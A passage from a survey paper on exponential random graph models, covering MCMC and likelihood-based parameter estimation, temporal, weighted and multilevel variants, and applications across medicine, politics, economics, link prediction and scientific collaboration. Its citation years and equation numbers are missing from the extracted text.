in this equation, u_k is the number of k-independent two-paths, and λ is a decaying factor that geometrically discounts higher-order independent two-paths. figure s illustrates k-independent two-paths.

the authors of wilson et al. ( ) addressed one of the significant drawbacks of ergms. as can be seen in tables s and s , the weights of the graphs are missing; in other words, these statistics are only applicable to unweighted graphs, and if we want to use them in the context of weighted graphs, the weights must be discarded. however, much useful information underlies the weights of a graph, and for most domains it is crucial to consider them to model the graph accurately. following ideas previously discussed in desmarais & cranmer ( ) and krivitsky ( ), they went on to design more flexible estimation methods for the so-called generalized ergms (gergm). their method can handle a wide range of graph statistics with continuous-valued edges.

the endogenous statistics need to be selected before implementing the model, so several assumptions must be made about choosing a particular statistic. although the process of finding the best statistics for a model is highly empirical, careful consideration is needed when forming hypotheses about the network's configurations, because the choice of a specific statistic depends strongly on the assumptions we have about the network phenomena. simple structures like the numbers of edges and nodes control the size and sparsity of the graph. in a friendship network, triangles can indicate the inclination of mutual friends to become friends with each other. in a citation network, stars point to a large number of central nodes (van der pol, ).
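to make eqs. ( ) and ( ) above concrete, the sketch below brute-forces the full ergm distribution for a tiny network, using the edge and triangle counts as the chosen configurations. this is only feasible for a handful of nodes and is meant as an illustration; the statistics, coefficient values and function names are our own assumptions.

```python
import numpy as np
from itertools import combinations

def stats(adj):
    """c(x): edge count and triangle count of an undirected 0/1 adjacency matrix."""
    n = adj.shape[0]
    edges = int(np.triu(adj, 1).sum())
    triangles = sum(1 for i, j, k in combinations(range(n), 3)
                    if adj[i, j] and adj[j, k] and adj[i, k])
    return np.array([edges, triangles])

def all_graphs(n):
    """Enumerate every labelled undirected graph on n nodes (2**(n*(n-1)/2) of them)."""
    pairs = list(combinations(range(n), 2))
    for mask in range(2 ** len(pairs)):
        adj = np.zeros((n, n), dtype=int)
        for b, (i, j) in enumerate(pairs):
            if (mask >> b) & 1:
                adj[i, j] = adj[j, i] = 1
        yield adj

def ergm_probability(x, theta):
    """P(X = x | theta) = exp(theta . c(x)) / N, with N summed over all graphs of the same size."""
    normaliser = sum(np.exp(theta @ stats(g)) for g in all_graphs(x.shape[0]))
    return float(np.exp(theta @ stats(x)) / normaliser)

theta = np.array([-1.0, 0.5])        # illustrative coefficients for edges and triangles
x_obs = np.zeros((4, 4), dtype=int)  # observed graph: a single triangle on nodes 0, 1, 2
for i, j in [(0, 1), (1, 2), (0, 2)]:
    x_obs[i, j] = x_obs[j, i] = 1
print(ergm_probability(x_obs, theta))
```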
the dyadic dependence assumption between nodes should also be considered when choosing the proper statistics for the model. dyadic dependence refers to dependent processes among dyads, where a dyad in this context is a pair of nodes and their relation. dyadic dependence among processes can give rise to a number of problems such as model degeneracy; for more information see handcock et al. ( ). new specifications like geometrically weighted degree counts and altering k-triangles have been introduced to alleviate model degeneracies resulting from dyadic dependence. this is achieved by increasing the stability of the model, weighting low densities more heavily and reducing the weight of higher degrees to avoid degeneracy (snijders et al., ; van der pol, ).

methods for estimation
after designing the model with the desired configurations, one crucial step in ergm modelling is to fit the coefficients of the model to the observed data. multiple methods exist for this purpose. nevertheless, the overall approach in all of them is to develop a likelihood function based on the ergm formulation and then solve it with one of the mathematical methods that exist for maximum likelihood estimation (mle). note that all of the mle solution methods need to be specialized for ergm modelling. after introducing the general form of this likelihood function, we present a brief description of some of the methods for solving it that have been presented in the literature.

a form of the likelihood function
we aim to find the values of the θ vector in eq. ( ) which maximize the probability of the observed data. more formally, we want to solve the following equation:

$$\theta_{ML} := \underset{\theta \in \mathbb{R}^{k}}{\arg\max}\; P(x \mid \theta) \qquad (\ )$$

where P is the same probability function as in eq. ( ) and $\mathbb{R}^{k}$ represents all possible real values over a k-dimensional space. note that θ is a vector of coefficients rather than a single value; thus, its search space is a vector space. different methods exist for solving such equations. here, we name a few of them which are most used in ergm-related works; we also present a number of state-of-the-art methods introduced in recent years.

preliminaries
sampling methods
there are two important applications of sampling methods in ergm parameter estimation:
• in all methods, there is a need to simulate graphs from the fitted model, or to simulate some graphs to gain more insight into the distribution of the graphs and their configurations (lusher, koskinen & robins, ). this distribution is also used to test whether the distribution of the fitted model is close to the observed data or not.
• predicting the prior distribution of the graphs for bayesian learning models.

figure: finite state automata of an mcmc procedure (start with an initial graph, usually empty; make a change to the graph from the previous state; generate probability results based on the graph statistics; choose between the current graph and the graph from the previous step; repeat until enough samples are drawn).
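the reason direct maximization of eq. ( ) is impractical is the size of the normalizing sum: for n nodes it runs over 2^{n(n-1)/2} labelled undirected graphs. the throwaway sketch below (illustrative only) prints how quickly that number grows, which is what motivates the sampling methods discussed next.

```python
# number of labelled undirected graphs entering the normalizing factor N
for n in (5, 10, 20, 30):
    dyads = n * (n - 1) // 2
    print(f"n = {n:2d} nodes -> 2^{dyads} ≈ {2.0 ** dyads:.3e} graphs")
```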
so, there is a need for sampling methods to draw samples from a given graph distribution. in this section, we present some of the sampling methods that have been used extensively in the literature.

monte carlo markov chain
the sampling method abbreviated as mcmc (metropolis et al., ) is a well-known sampling method which has been used in many works; here, we only discuss it in the context of graph generation. in this method, we start with an initial graph, which can also be an empty graph. then, in each iteration, a new graph is generated by making a small change to the graph from the last step. the form of this ''change'' differs from work to work; the most straightforward change is adding or removing a tie. the procedure is as follows: two nodes are chosen randomly, after which the state of their connection is toggled (if they are already connected, they become disconnected; if they are not connected, they become connected). in the next step, the probability of the generated graph is computed according to eq. ( ) and compared to that of the graph generated in the previous step. we then accept or reject the new graph based on the comparison of these two probabilities: if the new graph is more probable, it is more likely to substitute the old graph in the next iteration. note that a higher probability score does not guarantee that the new graph is chosen; it only increases its chance of selection. this outlines the general scheme shared by all mcmc methods; details such as how many ties are altered in each iteration, or how the probabilistic selection between the old and the new graph is performed, differ across the literature. below we present a quick introduction to the metropolis-hastings sampling method, which is the one mostly used in the ergm-related literature. the figure above displays the overall procedure of an mcmc method.

metropolis-hastings
metropolis-hastings (metropolis et al., ) is the most widely used mcmc derivation in ergm studies. in the context of graph generation it works as follows. initially, as explained in the general mcmc scheme, we start with an empty or random graph. our goal is to generate n samples from the distribution of graphs, that is, a sequence of graphs x_1, x_2, ..., x_n. at each step, we choose two random nodes and toggle the tie between them. the acceptance probability of the newly generated graph, relative to the graph from the last step, is then computed using the following formula:

$$\min\left\{1,\; \frac{P(X = x_{\mathrm{new}} \mid \theta)}{P(X = x_{n-1} \mid \theta)}\right\} \qquad (\ )$$

this formula gives the probability of accepting the new move or keeping the graph from the last step as the current one.

figure: procedure of fitting ergm variables (start with an initial parameter vector; simulate the distribution of the graphs based on that parameter; find the difference between the observed data and the simulated distribution; continue or stop based on that difference).
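the tie-toggling metropolis-hastings procedure just described can be sketched in a few lines of python; note that the normalizing factor N cancels in the acceptance ratio, so only the change in θᵀc(x) is needed. the statistics (edges and triangles), coefficient values and function names below are illustrative assumptions, not a reference implementation.

```python
import numpy as np
from itertools import combinations

def stats(adj):
    """c(x): edge and triangle counts of an undirected 0/1 adjacency matrix."""
    n = adj.shape[0]
    edges = int(np.triu(adj, 1).sum())
    triangles = sum(1 for i, j, k in combinations(range(n), 3)
                    if adj[i, j] and adj[j, k] and adj[i, k])
    return np.array([edges, triangles])

def metropolis_hastings(theta, n_nodes, n_samples, seed=0):
    """Sample graphs from an ERGM by toggling one randomly chosen tie per step and
    accepting with probability min(1, P(x_new | theta) / P(x_old | theta))."""
    rng = np.random.default_rng(seed)
    x = np.zeros((n_nodes, n_nodes), dtype=int)   # start from the empty graph
    samples = []
    for _ in range(n_samples):
        i, j = rng.choice(n_nodes, size=2, replace=False)
        proposal = x.copy()
        proposal[i, j] = proposal[j, i] = 1 - proposal[i, j]      # toggle the tie
        log_ratio = float(theta @ (stats(proposal) - stats(x)))   # log P(new) - log P(old); N cancels
        if np.log(rng.random()) < min(0.0, log_ratio):
            x = proposal
        samples.append(x.copy())
    return samples

draws = metropolis_hastings(theta=np.array([-1.0, 0.5]), n_nodes=6, n_samples=2000)
print(np.mean([s.sum() / 2 for s in draws]))   # average number of edges along the chain
```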
classic methods
so far, we have reviewed the necessary preliminaries. now, we can review the methods most widely used in the literature for estimating the values of the statistical parameters (θ in eq. ( )) that best represent the observed data; in other words, our aim is to solve eq. ( ). most of the methods use the following steps: initially, they start with an initial value for the parameter vector. then, the distribution of the graphs is generated by one of the sampling methods. next, the difference between that distribution and the observed data is computed as $E_{\theta}[c(X)] - c(x_{\mathrm{observed}})$. if the difference is satisfactory, the learning process is halted and the current parameter vector is considered the final answer which best fits the observed data; otherwise, depending on the learning method, the algorithm moves to a subsequent value of θ and returns to the simulation step. the figure above demonstrates the finite automata of this procedure. the ultimate goal of all learning methods is to find a vector of θ values in eq. ( ) that can generate graphs which are similar to the observed graphs. to this end, different learning methods exist, and this section describes the most important of them, namely importance sampling and stochastic approximation. we follow the description presented in lusher, koskinen & robins ( ).

importance sampling
the goal, as stated above, is to find the θ vector that minimizes the difference between the observed statistics and the ones generated by the ergm model, i.e., to use maximum likelihood to find the vector θ that maximizes the right-hand side of eq. ( ). one possible approach would be to search over all possible θ values and try them one by one; but since the search space is very large and the θ values are continuous, this approach is not practical. instead of such a brute-force algorithm, one of the methods for ergm parameter estimation is inspired by the general ml estimation framework for dependent data introduced by geyer & thompson ( ). the main idea is that, instead of generating all possible graphs for a particular θ vector, we draw a large sample of graphs at each iteration and treat it as a representation of all possible graphs. this sample is generated from the current value of the θ vector using eq. ( ) and is used to compute $E_{\theta}[c(X)]$, after which we check how close the value $E_{\theta}[c(X)] - c(x_{\mathrm{observed}})$ is to zero. at each iteration, an average over the statistics of the generated graphs is computed to estimate $E_{\theta}[c(X)]$ and to decide whether to continue the estimation or not. besides this halting criterion, we need an algorithm to move from each θ vector to a new one when the halting criterion is not satisfied; a newton-raphson update is used to move from one value to the next. for more detail on the mathematics of the sampling and the newton-raphson-based method, see lusher, koskinen & robins ( ).

stochastic approximation
the model presented in snijders ( ) can handle both bimodal and multimodal distributions and enhances the speed of convergence. it also uses the newton-raphson method for the learning step of the algorithm. as mentioned in lusher, koskinen & robins ( ), it is a three-phase method: in phase one, a limited number of iterations is performed to determine initial values for the algorithm; in the second phase, the newton-raphson algorithm is employed to optimize the answer; finally, the convergence criteria are checked.
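the general fitting loop described above (simulate at the current θ, compare the simulated mean statistics with the observed ones, update θ, repeat) can be sketched as follows. for brevity this sketch uses a plain stochastic-approximation update with a fixed step size instead of the newton-raphson step used in the cited methods; all names, statistics and tuning values are illustrative assumptions.

```python
import numpy as np
from itertools import combinations

def stats(adj):
    n = adj.shape[0]
    edges = int(np.triu(adj, 1).sum())
    triangles = sum(1 for i, j, k in combinations(range(n), 3)
                    if adj[i, j] and adj[j, k] and adj[i, k])
    return np.array([edges, triangles], dtype=float)

def mean_simulated_stats(theta, n_nodes, steps, rng):
    """Estimate E_theta[c(X)] with a short tie-toggling MCMC run."""
    x = np.zeros((n_nodes, n_nodes), dtype=int)
    total = np.zeros(2)
    for _ in range(steps):
        i, j = rng.choice(n_nodes, size=2, replace=False)
        proposal = x.copy()
        proposal[i, j] = proposal[j, i] = 1 - proposal[i, j]
        if np.log(rng.random()) < min(0.0, float(theta @ (stats(proposal) - stats(x)))):
            x = proposal
        total += stats(x)
    return total / steps

def fit_ergm(x_obs, theta0, iterations=100, step_size=0.05, mcmc_steps=500, seed=0):
    """Move theta until the simulated statistics roughly match the observed ones,
    i.e. until E_theta[c(X)] - c(x_observed) is close to zero."""
    rng = np.random.default_rng(seed)
    theta, c_obs = np.asarray(theta0, dtype=float), stats(x_obs)
    for _ in range(iterations):
        diff = mean_simulated_stats(theta, x_obs.shape[0], mcmc_steps, rng) - c_obs
        theta -= step_size * diff   # simulated statistics too high -> push coefficients down
    return theta

x_obs = np.zeros((6, 6), dtype=int)   # observed toy graph: a 6-node cycle
for i in range(6):
    x_obs[i, (i + 1) % 6] = x_obs[(i + 1) % 6, i] = 1
print(fit_ergm(x_obs, theta0=[0.0, 0.0]))
```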
newly presented methods for ergm estimation in byshkin et al. ( ), the authors improved the mcmc sampling part of the ergm estimation by adding an auxiliary parameter to the model. in their method, which they called improved fixed density (ifd) mcmc sampler, they tried to decrease the state space of the network to reduce the time complexity of the algorithm. this new auxiliary variable which was based on the number of ties helped the model to converge faster without the need of making the mcmc overall model more complicated. in some works like (stivala et al., ), snowball sampling (coleman, ; goodman, ) was used to overcome the computational complexity of the mcmc method over large network datasets. as mentioned earlier, the bayesian estimation of the parameters requires prior knowledge about the network posterior distribution. however, this posterior probability distribution ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. is not always easily available. to overcome this issue, (bouranis, friel & maire, ) introduced a pseudo-likelihood estimation approach by replacing the posterior distribution with a more achievable pseudo-distribution. although this method resulted in faster computation of the likelihood function, as mentioned in the (schmid & desmarais, ), its results are not still as precise as they should. to handle this problem, the same mentioned article introduced another pseudo-likelihood estimator based on the bootstrapping parameters which culminated in more accurate convergence. in a recent work (bouranis, friel & maire, ), the authors proposed yet another heuristic model based on pseudo-likelihood estimation. they did so by performing three adjustments to the pseudo-likelihood function: ( ) mode corrections to overcome the bias of the pseudo-likelihood function; ( ) curvature adjustment, which is a modification in the selection of the transformation matrix and the corresponding hessian matrix; and ( ) magnitude adjustment, which is a linear transformation to scale the curvature-adjusted pseudo likelihood to the right values. despite all the progress in the ergms parameter estimation and modeling, it is still a hard task in large graphs. thiemichen & kauermann ( ) addressed two of the main challenges of ergms, including the instability of the model especially in the models with more straightforward statistics like triangles and the time-consuming nature of the ergm parameter estimation procedure due to large number of numerical simulations. for solving the first problem, they proposed a technique to produce smooth stable statistics. further, to overcome the second issue, they employed a novel subsampling model which instead of fitting the model to the whole network it only fit the model to subgraphs from the network and then aggregated these sample estimates. the two mentioned ideas yielded a significant improvement for modeling large graphs. ergms variations apart from the basic definition of ergms there are also some other variations of ergms. each year a number of new extensions of the original ergm definition are introduced. in this chapter we introduce three of the most widely used ergms variations. evolution of networks in dynamic environment like social networks has attracted scientist to make an extension of the ergms called temporal ergms a.k.a. tergms which is capable of capturing the information underlying dynamics of such networks (hanneke et al., ). 
a markov assumption is made between the snapshots of the network at each timestep. the model is then built upon the relation between each two consecutive snapshots s^t and s^{t-1}:

$$P(X = s^{t} \mid s^{t-1}, \theta) = \frac{1}{N(\theta, s^{t-1})}\,\exp\{\theta^{T}\,\psi(s^{t}, s^{t-1})\} \qquad (\ )$$

as can be seen in eq. ( ), most parts of the tergm formula are similar to the normal ergm. however, time snapshots are now considered, and each new snapshot s^t depends on its predecessor s^{t-1}. also, the normal counts of the network statistics have been substituted with the temporal potential counts ψ computed over two consecutive snapshots. for more information see hanneke et al. ( ), and for information about btergm, a library for temporal ergms, see leifeld, cranmer & desmarais ( ).

most real-world networks carry a value on their edges; these are referred to as weighted graphs in graph theory. a considerable amount of research has been done to bring these types of networks into the general ergm scheme. gergm (desmarais & cranmer, ) and the model proposed by krivitsky ( ) are the two best-known models which have incorporated edge weights. the normalizing factor in eq. ( ), which is the denominator of eq. ( ), is not guaranteed to converge when the network statistics (c(x) in eq. ( )) range over an infinite set, as is the case with continuous-valued edges. gergm is a model aimed at overcoming this issue by using a probability model for such continuous values; the authors build a transformed version of the original ergm formula that no longer suffers from this problem. krivitsky ( ) has also extended the earlier binary version of ergm, which only models the existence of edges rather than their value, into a model capable of capturing the information of weighted graphs; however, his method is restricted to natural-valued edge weights.

in network science there is a special kind of network called a multiplex or multilayer network. these are networks whose nodes are connected in the context of more than one attribute. for example, in a social relation network, actors might have several relations between them, such as a friendship network or a co-working network, and each of these relations can be abstracted as a layer in a network model. also, in some situations there is a hierarchical structure in the data, such as modelling the relations inside a university, where there are schools, which are divided into groups, lecturers, and students. an extension of ergm applicable to such scenarios in multilevel networks has been proposed (wang et al., ). it incorporates the relations between the nodes in each level as well as the inter-level relations into the model. for example, consider a two-layer network with layers a and b and an imaginary layer between them called x, whose purpose is to model the inter-level relations between a and b. then eq. ( ) is re-written as:

$$P(A = a, X = x, B = b \mid \theta) = \frac{1}{N}\exp\{\theta_{A}^{T} c_{A}(a) + \theta_{B}^{T} c_{B}(b) + \theta_{X}^{T} c_{X}(x) + \theta_{A,X}^{T} c_{A,X}(a,x) + \theta_{B,X}^{T} c_{B,X}(b,x) + \theta_{A,B,X}^{T} c_{A,B,X}(a,b,x)\} \qquad (\ )$$

where θ_A, θ_B, θ_X, θ_{A,X}, θ_{B,X}, θ_{A,B,X} are the parameters for the statistics extracted from layers a and b, from the inter-level relations a,x and b,x, and from the joint relation of layers a, b, and x. the same holds for the corresponding count functions, and θ denotes the collection of all these parameter blocks.
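as a toy illustration of the temporal statistics ψ(s^t, s^{t-1}) appearing in the tergm formulation above, the sketch below computes, for two consecutive snapshots, how many ties persisted and how many newly formed, and evaluates the corresponding unnormalized weight exp{θᵀψ}; the particular statistics and coefficient values are our own illustrative assumptions.

```python
import numpy as np

def temporal_stats(s_t, s_prev):
    """psi(s_t, s_{t-1}): two toy temporal statistics on consecutive snapshots --
    the number of ties that persisted and the number of ties that newly formed."""
    upper = np.triu_indices_from(s_t, k=1)
    persisted = int(np.sum((s_t[upper] == 1) & (s_prev[upper] == 1)))
    formed = int(np.sum((s_t[upper] == 1) & (s_prev[upper] == 0)))
    return np.array([persisted, formed])

# two consecutive snapshots of a 4-node network
s_prev = np.array([[0, 1, 0, 0],
                   [1, 0, 1, 0],
                   [0, 1, 0, 0],
                   [0, 0, 0, 0]])
s_t = np.array([[0, 1, 1, 0],
                [1, 0, 1, 0],
                [1, 1, 0, 1],
                [0, 0, 1, 0]])
theta = np.array([1.0, -0.5])   # illustrative coefficients

# unnormalized weight exp{theta^T psi(s_t, s_prev)}; the normalizing factor
# N(theta, s_prev) would sum this quantity over every possible snapshot s_t.
print(temporal_stats(s_t, s_prev), np.exp(theta @ temporal_stats(s_t, s_prev)))
```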
applications of ergms as mentioned previously, ergms are a useful tool for scientists from various disciplines. networks are everywhere, and anywhere that they exist they can be analyzed using ergms and other statistical models. note that here we have mostly reviewed the works since . medical imaging in order to take care of the limitations of the descriptive analysis of brain neural networks, the author of sinke et al. ( ) used ergms to be able to model the observed network using the joint contribution of network structure. they also compared the changes in brain ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. networks statistics across different ages. this study was conducted to examine the effects of aging during lifetime in the brain global and local structures. graphs where extracted from brain images obtained from diffusion tensor imaging (dti). four network statistics were used to model these networks: • the number of edges • the geometrically weighted edgewise shared partner (hunter, ) • the geometrically weighted non-edgewise shared partner (hunter, ) • the hemispheric node match: a binary indicator which shows whether two nodes are in the same hemisphere of the brain. the bayesian learning schema from caimo & friel ( ) was used to fit the model. in a recent work, (dellitalia et al., ) employed ergms to study the structure of neural networks of the brain. they aimed to increase the chance of unconscious and injured patients to recover by analyzing brain functional data. in their work, they overcame four shortcomings of previous methods by incorporating ergms into their study. for example, one of them was the ability to assess the dynamics of the network over time.they used the separable temporal ergms (tergm) (krivitsky & handcock, ) for their modeling. one of the aspects of their work that successfully handled with ergms was that the network structures they chose should have not been necessarily independent. this restriction was one of the main drawbacks of previous methods. functional magnetic resonance imaging or fmri is a method for observing brain activities and their changes over time. there are components in the fmri images which can be explained using network analysis methods. nodal signals, network architecture, and network function are the three essential network properties in building fmri-based networks (solo et al., ). ergms are one the main important network analysis methods which have been used to explain such networks. the authors of a review paper (solo et al., ) introduced the most critical efforts with the aim to explain these brain networks. note that there are plenty of works which used ergm as their method (simpson, hayasaka & laurienti, ; simpson, moussa & laurienti, ). healthcare applications having a healthy life is one the central concerns of human life. if we look at this issue from a macro perspective, we can see that many health-related problems can be alleviated by analyzing their corresponding inter-related actors. for example, in epidemiology, there is a direct connection between the patient relationships and the extent that the disease can spread. in most cases, these relations between the actors will result in the formation of a network. this network can be analyzed using ergms to answer different questions underpinning its formation and dynamics. this kind of analysis is something that has already been done extensively by researchers in the healthcare community. 
analyzing inter-hospital patient referral network is a significant problem which (caimo, pallotti & lomi, ) has recently investigated using ermgs. they used a combination of the edges and nodes of the network and utilized the bayesian approach introduced in ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. caimo & friel ( ) to fit their model. this task was done using bergm (caimo & friel, ) r language package for their implementation. another work (baggio, luisier & vladescu, ) shed light on the relationship between social isolation and mental health. the connection between these two subjects was investigated by analyzing the network of romanian adolescents using ergm modeling. they concluded that there is a strong link between the two mentioned concepts. application of statistical network in epidemiology and disease spreading is another interesting topic which has attracted from the attention of the biological science community. (silk et al., ) provided an important opportunity to advance the understanding of the pattern and evolution of infections in static and dynamic environments. they also used ergms for their models. in their ergm model, they employed a fair number of both structural and node-based attributes. the ergm (hunter et al., ) r language package was used for the tests. social ties can reveal a wide range of aspects of human life. the networks formed by such ties and edges among individuals can transfer life habits and behaviors in a society. for example, in many kinds of literature, the relationship between social tie and analysis of obesity has been investigated. zhang et al. ( b) thoroughly studied the articles related to applications of social network analysis to obesity. in another work related to eating disorders, (becker et al., ) have presented some findings using ergm network analysis about the relationship between the eating disorders and human relationships. they conducted their study on members of a sorority at southeastern university. economics and management marketing organizations that are responsible for promoting tourist destination have also been analyzed using ergms. (williams & hristov, ) intended to study the networks underpinning destination marketing organizations (dmos). they developed four models with the most complex one consisting of the following statistics: • number of edges • the geometrically weighted edgewise shared partner (hunter, ) • properties of membership and industry background. global migration and different attributes of immigrants can be considered as a network. there are many theories on how these networks shape and evolve and how they depend on immigrants and country backgrounds. ethnicity, wealth, religion). (windzio, ) applied ergm in order to examine theories and hypotheses about creation and evolution of these networks. he used both the graph structure and node attributes in a large number of statistics. global tourism and its corresponding network, global tourism network (gtn), is yet another field of study, given the tremendous financial importance of tourism market. as mentioned in lozano & gutiérrez ( ), it is essential to gain insight into the connections between its components. in the same article, an ergm approach was used to find the critical local substructures of the gtns. ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
handling the budget and resources during crises is always a challenging task for humanitarian organizations. there is a need for a tradeoff between the use of asset supplies for the current crises and the usual ongoing projects. this problem has been formulated in the form of asset supply networks. stauffer et al. ( ) used ergms as an empirical model to understand the asset flows during a crisis. the applications of ergms have even been extended to the analysis of online drug distribution networks. in a recent work, (duxbury & haynie, ) conducted the mentioned research on a dataset of an online drugstore on the dark web. they studied such networks concerning their topological dynamics, suppliers, and customer demand as well as the resistance of such networks to disruptions. does economic partnership between professionals will result in further trust and solidarity? this is the central question of bianchi, casnici & squazzoni ( ). they developed an ergm multiplex network model collaboration network and a number of other attributes and then analyzed it using multivariate ergms to examine social support and trust for each of the network statistics. political science a large number of articles in the political science community have used ergms for their modeling. this enthusiasm toward ergms among political science scholars well suggests that it is among the most famous mathematical modeling in the field. here we introduce a handful of these articles. sustainable development policy is a major concern both for the government and the private sector. it is only achievable by interaction among individuals. in particular, the role of the connection between funding sectors and those in need of money is important for carrying out their projects. this is the central problem of gallemore & jespersen ( ). the dataset consisted of donor organizations. the role of ergm in this work was modeling the donor agent relationship networks. another major issue that has been addressed through ergms is collaborative governance between different sectors and individuals of multiple organizations. in ulibarri & scott ( ), the authors used ergm to test their hypothesis about what should be observed in low-collaboration vs. high-collaboration networks. four simple ergms’ configurations were used, including: • the number of networks ties • the number of nonzero ties • the number of reciprocity relations in the network • the number of transitivity relations in the network. in a more recent work, (scott & thomas, ) addressed the same problem. however, they used different datasets and network statistics. hamilton & lubell ( ) also took the same ergm modeling approach in discussing the collaborative governance, in the special domain of climate change adoption. in an exciting work, li et al. ( ) investigated the effectiveness of military alliances in making peace between states. they used temporal random graph models for longitudinal ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. network data of alliance. they employed two different sets of network statistics and developed two models upon them. communications via internet social networks have helped the human to take a huge step further. people from multiple backgrounds and societies are engaged in conversations that have never been possible before the widespread popularity of online social networks. 
in the case of political conversations in social networks, there is always the dilemma whether this freedom has resulted in more communications between people with different ideologies or adversely it will cause people with same viewpoints tend to dominate most of the conversation thereby self-reinforcing the same way of thinking. (song, cho & benefield, ) addressed this issue by studying the network of message selection of users during a presidential election and then analyzed the mentioned network by a temporal ergm (termg) to answer the questions above. the world trade network has also been investigated via tergms. pan ( ) studied these networks to answer the underlying questions about them and their effects on related subjects. even further, some works such as chen ( ) took the use of ergm networks in modeling political networks a step further by incorporating multilayer networks properties into their models. he proved with experimental results that this multilayer approach toward ergms could better fit the model to the observed data. the analysis and challenges of power transition in a personalized authoritarian system is a problem that has been discussed in osei ( ) using ergm modeling. in addition to qualitative methods, the author employed ergm as a quantitative method to answer questions about the regime survival of the regime under the mentioned situations. the network in this context consisted of elite interactions network in authoritarian countries. they found that many of the important people in the past ruler administration still play a crucial role in the current government. environmental treaties among governments play a vital rule in solving environmental issues. however, coming to an agreement in such commitments is not straightforward. the aim of campbell et al. ( ) is to study the model of ratification in such treaties among different parties or states. the main contribution of this research is to find out how the influence network between countries can affect the interdependency of countries decisions on environmental politics. to this end, they have used bipartite longitudinal influence network (blin) model to extract two latent influence network using which show negative and positive influence among different countries. later these two networks have been analyzed using ergms to find the effective contextual and structural network statistics on the shaping of influence (negative or positive) networks (marrsetal, ). network of international arm trade is yet another subject that has been studied using ergm simulations (thurner et al., ). the structure of weapon exchanges network between countries and alias is very complicated. a plethora of effective factors are effective in the formation of the network. economic enhancement of the seller and the desire to strengthen they allay in different regions of the words are two important considerations from the dealers. their datasets are extracted from available data of arm deals after world war ii. temporal ergms were used for during the analysis. they have used a number of statistics based on their hypothesis about importer and exporter effects, size of the ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. countries’ domestic economic markets, national material capabilities, conflict involvement joint membership in defense agreement, geographic distance between two countries. most of the statistics used in this work were exogenous statistics. 
missing data and link prediction
link prediction is the problem of finding missing links in a network. as explained above, ergms deal with estimating the graph distribution and generating new graphs based on it, and the graph-generation part is exactly the process needed for finding missing links. however, in link prediction we do not want to estimate the whole graph distribution; we want the probability of link formation between two nodes given the current structure of the graph.

smith ( ) used ergms to create a global view of networks with missing data based on sampled data. in this approach, sampled ego networks are taken and used to estimate features of the whole network. the interesting aspect of this work is that both the structure of the network and its size were unknown. a three-step algorithm was used, and in the last step the aim was to predict the global structure of the network from the fitted model. two real-world network datasets were used in the tests, the add health network and a sociology co-authorship network. koskinen et al. ( ) used the same approach of leveraging ergms for data augmentation in graphs with missing tie variables; in an empirical test, they were able to estimate the missing tie variables of a partially observed network with fair precision. as the article's name suggests, they used a bayesian estimation method for fitting the parameters of their model.

zhang, zhai & wu ( ) applied ergms to predicting links in microblogs. they used five kinds of graph statistics, four of which were introduced in hunter ( ):
• number of edges
• gwidegree (geometrically weighted indegree): the weighted indegree of the network.
• gwodegree (geometrically weighted outdegree): the weighted outdegree of the network.
• gwdsp (geometrically weighted dyadwise shared partner): the number of shared nodes over all node pairs in the network.
• gwesp (geometrically weighted edgewise shared partner): similar to gwdsp, but counting shared nodes only for linked node pairs in the network.
the link prediction method based on ergms introduced in this article is an iterative approach. at each step, the conditional probability of adding an edge between two arbitrary nodes is computed given the observed part of the network. this process is repeated several times through an mcmc simulation, and finally the average over all these steps is computed:

$$P(x_{ij} = 1 \mid X^{c} = x^{c}) = \frac{1}{N}\,\exp\left(\theta^{T} c(x_{ij} = 1,\, x^{c})\right) \qquad (\ )$$

in eq. ( ), x_ij indicates the presence of an edge between nodes i and j, and x^c is the state of all other edges at the time of predicting x_ij. five datasets have been used:
different missing data treatment methods have been tested on different missing data in a complete benchmarking framework. scientific collaboration finding the best colleagues or best-related research papers and topics is always a significant issue for anyone in the scientific community. co-author and citation networks analyses are two important topics that have been extensively studied in research related to analysis of networks addressing these issues. the researchers in zhang et al. ( a) addressed the effect of three major network properties in scientific collaboration networks including homophily, transitivity, and preferential attachment. performing an ergm study on these networks, they argued that incorporating the mentioned properties we can provide more insight into how collaborations form. the data for this study were collected using the metadata of papers’ citations from the web of science from to . as we approach more complex scientific phenomena, we more feel the need for collaboration between different scientific communities. fagan et al. ( ) also studied a co-authorship network to evaluate the changes in inter-disciplinary scientific articles. more precisely, they applied a special form of ergms called the separable temporal ergms (stergm) krivitsky & handcock ( ) to evaluate the co-authorship network over time and make prediction ties in the network. they employed some structural and nodal attributes. structural attributes refer to a number of edges, degree, and triadic closure, while some nodal attributes capture whether two individuals have the same professor rank, gender, and college. ergms are widely used for citation networks analysis. an & ding ( ) performed the same study in the special case of publications on causal inference. they argued that some technical and social processes are underpinning citation networks. their ultimate goal was to explain the essential factors in forming a citation network and predicting the citation patterns. an in-depth study of polarization among researchers of the field of social science was performed in a recent work (leifeld, ). he used both qualitative and quantitative methods to address the most compelling reasons and strategies causing the polarization. ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. he applied ergm as his qualitative method over two co-authorship networks in the field of social science in two separate countries. other than the studies on co-authorships and citation networks there are other aspects of scientific collaboration that have been widely studied. one of such studies is the study on how the recruitment of new members of scientific collaborators in scientific organizations takes place. in a study (leifeld & fisher, ) the dynamics underlying the membership procedure of new scientist in international scientific assessments has been evaluated. the authors have used a dataset extracted from an international well-known research program on world’s ecosystem called millennium ecosystem assessment (ma). their method is based on analyzing the pattern of the network formation by ergm using a number of exogenous and endogenous network’s statistics. the analysis approved the authors hypothesis which suggests that factors like having the same nationality to the previous researcher in the research group or being in the same institution with them have a high impact on the recruitment of new researchers. 
